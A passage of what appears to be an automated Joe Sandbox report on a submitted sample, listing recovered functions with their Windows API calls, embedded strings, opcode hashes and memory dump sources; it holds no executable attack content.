                                                              • Instruction Fuzzy Hash: A3314B71600205DFFB20AA3DD846B9AB7E9FF12360F105429E298D7A92DF71EC41CB21
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetWindow.USER32(?,00000005), ref: 0089D6C1
                                                              • GetClassNameW.USER32(00000000,?,00000800), ref: 0089D6ED
                                                                • Part of subcall function 00891FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0088C116,00000000,.exe,?,?,00000800,?,?,?,00898E3C), ref: 00891FD1
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0089D709
                                                              • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0089D720
                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 0089D734
                                                              • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0089D75D
                                                              • DeleteObject.GDI32(00000000), ref: 0089D764
                                                              • GetWindow.USER32(00000000,00000002), ref: 0089D76D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                              • String ID: STATIC
                                                              • API String ID: 3820355801-1882779555
                                                              • Opcode ID: fd3bfa4dc705ee8088ba5851acf51e5f675e509867fab4776eb100f7cda5f569
                                                              • Instruction ID: 15ebadff890a87e9013cc79f6ddb396d5477435d85942dd5972b7a83eaae9188
                                                              • Opcode Fuzzy Hash: fd3bfa4dc705ee8088ba5851acf51e5f675e509867fab4776eb100f7cda5f569
                                                              • Instruction Fuzzy Hash: 231121322447507BEA21BBB49CCEFAF765CFB50751F098120FA51EA092DA64CE0542AA
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • _free.LIBCMT ref: 008A9705
                                                                • Part of subcall function 008A8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,008AC896,008B3A34,00000000,008B3A34,00000000,?,008AC8BD,008B3A34,00000007,008B3A34,?,008ACCBA,008B3A34), ref: 008A8DE2
                                                                • Part of subcall function 008A8DCC: GetLastError.KERNEL32(008B3A34,?,008AC896,008B3A34,00000000,008B3A34,00000000,?,008AC8BD,008B3A34,00000007,008B3A34,?,008ACCBA,008B3A34,008B3A34), ref: 008A8DF4
                                                              • _free.LIBCMT ref: 008A9711
                                                              • _free.LIBCMT ref: 008A971C
                                                              • _free.LIBCMT ref: 008A9727
                                                              • _free.LIBCMT ref: 008A9732
                                                              • _free.LIBCMT ref: 008A973D
                                                              • _free.LIBCMT ref: 008A9748
                                                              • _free.LIBCMT ref: 008A9753
                                                              • _free.LIBCMT ref: 008A975E
                                                              • _free.LIBCMT ref: 008A976C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: d434dc3ddb3378fe5ba016464860b281e8e3d14ee8ff78e30490fb4ff7f374f3
                                                              • Instruction ID: 960c622ca857e33f3dfd0873db6cdf748cd03ce8d45f4f7c7da7b71f57d7f7c3
                                                              • Opcode Fuzzy Hash: d434dc3ddb3378fe5ba016464860b281e8e3d14ee8ff78e30490fb4ff7f374f3
                                                              • Instruction Fuzzy Hash: 2811D4B6500009EFEB01EFA8C842CD93BB5FF15390B4150A0FB088FA62DE32DA509B95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 322700389-393685449
                                                              • Opcode ID: ea3d9829c291a9878fde1bb86c769fdae3ac39481250986d3748a6d5023df64a
                                                              • Instruction ID: e46f311bc5ad5260f530c04c4e6a479d64907c307629b1f98872fbb66f5a8fc3
                                                              • Opcode Fuzzy Hash: ea3d9829c291a9878fde1bb86c769fdae3ac39481250986d3748a6d5023df64a
                                                              • Instruction Fuzzy Hash: 64B18F71800219EFEF25DFA8C8819AEB7B5FF16310F14415AF811ABA12D735EA51CF92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00886FAA
                                                              • _wcslen.LIBCMT ref: 00887013
                                                              • _wcslen.LIBCMT ref: 00887084
                                                                • Part of subcall function 00887A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00887AAB
                                                                • Part of subcall function 00887A9C: GetLastError.KERNEL32 ref: 00887AF1
                                                                • Part of subcall function 00887A9C: CloseHandle.KERNEL32(?), ref: 00887B00
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                              • API String ID: 3122303884-3508440684
                                                              • Opcode ID: 07bd88dd018ec901b175bae6dd242e871e935307d03302930bb286df362498db
                                                              • Instruction ID: 52eaa80bac8aed52205572b7af367f78171a8dca0c12fcf00bc2c0867a0f9175
                                                              • Opcode Fuzzy Hash: 07bd88dd018ec901b175bae6dd242e871e935307d03302930bb286df362498db
                                                              • Instruction Fuzzy Hash: 3741E5B1D08744AAEB20F7789C86FEE777CFF15304F140455FA55E6282D674AA888722
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • _wcslen.LIBCMT ref: 00899736
                                                              • _wcslen.LIBCMT ref: 008997D6
                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 008997E5
                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00899806
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$AllocByteCharGlobalMultiWide
                                                              • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                              • API String ID: 1116704506-4209811716
                                                              • Opcode ID: af0bacc88985ddcc93b4179eba9a939ef978625b76d45f5bf0607d3ba0fee159
                                                              • Instruction ID: fafa6d481c06eac0908c0dfabd5988e175348f2b15620a5d9d4e283d68ad442c
                                                              • Opcode Fuzzy Hash: af0bacc88985ddcc93b4179eba9a939ef978625b76d45f5bf0607d3ba0fee159
                                                              • Instruction Fuzzy Hash: BB3115325087017AEB25BF6C9C46FAB779CFF52320F18011DF551E66D2EB649A0883A7
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00881316: GetDlgItem.USER32(00000000,00003021), ref: 0088135A
                                                                • Part of subcall function 00881316: SetWindowTextW.USER32(00000000,008B35F4), ref: 00881370
                                                              • EndDialog.USER32(?,00000001), ref: 0089B610
                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 0089B637
                                                              • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0089B650
                                                              • SetWindowTextW.USER32(?,?), ref: 0089B661
                                                              • GetDlgItem.USER32(?,00000065), ref: 0089B66A
                                                              • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0089B67E
                                                              • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0089B694
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Item$TextWindow$Dialog
                                                              • String ID: LICENSEDLG
                                                              • API String ID: 3214253823-2177901306
                                                              • Opcode ID: 31fc97af8cde5a9da841bc7f1052923402fe0c88cec3153d5d3ddc4cedc70ffd
                                                              • Instruction ID: 2eed8b4fe44ef66d0edc37a24fb06d5782a91cef9c1b2426bd6b6a6b2e4a6cc1
                                                              • Opcode Fuzzy Hash: 31fc97af8cde5a9da841bc7f1052923402fe0c88cec3153d5d3ddc4cedc70ffd
                                                              • Instruction Fuzzy Hash: FD210532204214BBDA126F6AFD8DF3B3B6CFB56B41F050019F601EA4A0CB62AE019631
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,B42F9490,00000001,00000000,00000000,?,?,0088AF6C,ROOT\CIMV2), ref: 0089FD99
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0088AF6C,ROOT\CIMV2), ref: 0089FE14
                                                              • SysAllocString.OLEAUT32(00000000), ref: 0089FE1F
                                                              • _com_issue_error.COMSUPP ref: 0089FE48
                                                              • _com_issue_error.COMSUPP ref: 0089FE52
                                                              • GetLastError.KERNEL32(80070057,B42F9490,00000001,00000000,00000000,?,?,0088AF6C,ROOT\CIMV2), ref: 0089FE57
                                                              • _com_issue_error.COMSUPP ref: 0089FE6A
                                                              • GetLastError.KERNEL32(00000000,?,?,0088AF6C,ROOT\CIMV2), ref: 0089FE80
                                                              • _com_issue_error.COMSUPP ref: 0089FE93
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                              • String ID:
                                                              • API String ID: 1353541977-0
                                                              • Opcode ID: ef58c9ee092462e2f1c5d0f6dbdffe91134a0658c917890ceab30603a398309b
                                                              • Instruction ID: a50809acd68fa37ce2773463eac84aac5281f1d98056b2ce2c3e4596eca4b16a
                                                              • Opcode Fuzzy Hash: ef58c9ee092462e2f1c5d0f6dbdffe91134a0658c917890ceab30603a398309b
                                                              • Instruction Fuzzy Hash: 9041DA71A00219AFDF14AF68CC45BAFBBA8FF44714F184239FA15EB652D7349900C7A5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                              • API String ID: 3519838083-3505469590
                                                              • Opcode ID: 565e717a35932ca62266eba5233da0cb725939d6cf44288708cdda7dae042f49
                                                              • Instruction ID: a35a24b98e82bd520d3738b1b1797bae2f2ba0b6df0f881275cec851644323aa
                                                              • Opcode Fuzzy Hash: 565e717a35932ca62266eba5233da0cb725939d6cf44288708cdda7dae042f49
                                                              • Instruction Fuzzy Hash: 89715C70A00619EFEB14EFA4CC959AFBBB9FF88314B14015DE516E72A0CB30AD01CB51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00889387
                                                              • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 008893AA
                                                              • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 008893C9
                                                                • Part of subcall function 0088C29A: _wcslen.LIBCMT ref: 0088C2A2
                                                                • Part of subcall function 00891FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0088C116,00000000,.exe,?,?,00000800,?,?,?,00898E3C), ref: 00891FD1
                                                              • _swprintf.LIBCMT ref: 00889465
                                                                • Part of subcall function 00884092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008840A5
                                                              • MoveFileW.KERNEL32(?,?), ref: 008894D4
                                                              • MoveFileW.KERNEL32(?,?), ref: 00889514
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                              • String ID: rtmp%d
                                                              • API String ID: 3726343395-3303766350
                                                              • Opcode ID: 37c4181bc81cb4f4a78de8dcc9cf18051ba1df3e1f4c6f7ba29d4afc5fbc3ab1
                                                              • Instruction ID: 70eab6f05cf3d342c0979eca4236a5ab8d41c98e733984f461bbe487ed3e571c
                                                              • Opcode Fuzzy Hash: 37c4181bc81cb4f4a78de8dcc9cf18051ba1df3e1f4c6f7ba29d4afc5fbc3ab1
                                                              • Instruction Fuzzy Hash: 8C4184B1940259A6DF21FBA4CC45EEE737CFF45340F0848A5F689E3051EB389B898B61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __aulldiv.LIBCMT ref: 0089122E
                                                                • Part of subcall function 0088B146: GetVersionExW.KERNEL32(?), ref: 0088B16B
                                                              • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00891251
                                                              • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00891263
                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00891274
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00891284
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00891294
                                                              • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 008912CF
                                                              • __aullrem.LIBCMT ref: 00891379
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                              • String ID:
                                                              • API String ID: 1247370737-0
                                                              • Opcode ID: cbe357b1edfaa8aee5aca922ee45b7b60957a6ee6f7fd13ca1303fccbdb9d9d9
                                                              • Instruction ID: 7e186afca379b63f09818838ee54390764b3569d34f7b70828311ec6e62ef739
                                                              • Opcode Fuzzy Hash: cbe357b1edfaa8aee5aca922ee45b7b60957a6ee6f7fd13ca1303fccbdb9d9d9
                                                              • Instruction Fuzzy Hash: 29410CB15083059FCB10EF65C88496BBBF9FF88314F04892EF596C2210E738E549DB52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • _swprintf.LIBCMT ref: 00882536
                                                                • Part of subcall function 00884092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008840A5
                                                                • Part of subcall function 008905DA: _wcslen.LIBCMT ref: 008905E0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: __vswprintf_c_l_swprintf_wcslen
                                                              • String ID: ;%u$x%u$xc%u
                                                              • API String ID: 3053425827-2277559157
                                                              • Opcode ID: ed1812c69c6cc61d1ad9c5e0f883498c511386fbc355d7e53920cc61b7dc3308
                                                              • Instruction ID: bf5e8f9581cf40c2d806bd5c41ffbd0b24ad1a90e4a1a7e66498a50a64837bf0
                                                              • Opcode Fuzzy Hash: ed1812c69c6cc61d1ad9c5e0f883498c511386fbc355d7e53920cc61b7dc3308
                                                              • Instruction Fuzzy Hash: E9F1F3706083419BDF25FB288495BEA779AFF90300F08057DED8AEB287DB6499458763
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID: </p>$</style>$<br>$<style>$>
                                                              • API String ID: 176396367-3568243669
                                                              • Opcode ID: 2b801be6e34c2c577b3b32c844c02b8b37dd79956567d40c5b84a5f05473160f
                                                              • Instruction ID: 331269b44e0d3e2712874b77c777e9128441b9e08ac631568a60288fbd685cbd
                                                              • Opcode Fuzzy Hash: 2b801be6e34c2c577b3b32c844c02b8b37dd79956567d40c5b84a5f05473160f
                                                              • Instruction Fuzzy Hash: 5C51F46664532395DF30BA2D9C5277A73A0FFA1790F6D042EF9C1CB6C1FBA58C818261
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,008AFE02,00000000,00000000,00000000,00000000,00000000,?), ref: 008AF6CF
                                                              • __fassign.LIBCMT ref: 008AF74A
                                                              • __fassign.LIBCMT ref: 008AF765
                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 008AF78B
                                                              • WriteFile.KERNEL32(?,00000000,00000000,008AFE02,00000000,?,?,?,?,?,?,?,?,?,008AFE02,00000000), ref: 008AF7AA
                                                              • WriteFile.KERNEL32(?,00000000,00000001,008AFE02,00000000,?,?,?,?,?,?,?,?,?,008AFE02,00000000), ref: 008AF7E3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                              • String ID:
                                                              • API String ID: 1324828854-0
                                                              • Opcode ID: fed920a6f9262821adc552716fe53048227b9da2e15cde241fd68714827833cc
                                                              • Instruction ID: 93cc5e768ef2010ba8d40427089afb63d4fa88ce5da8103509d163008544d1b6
                                                              • Opcode Fuzzy Hash: fed920a6f9262821adc552716fe53048227b9da2e15cde241fd68714827833cc
                                                              • Instruction Fuzzy Hash: DB5182B19002499FDB10CFA8DC85AEEBBF8FF09310F14416AE655E7652D774AA41CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • _ValidateLocalCookies.LIBCMT ref: 008A2937
                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 008A293F
                                                              • _ValidateLocalCookies.LIBCMT ref: 008A29C8
                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 008A29F3
                                                              • _ValidateLocalCookies.LIBCMT ref: 008A2A48
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
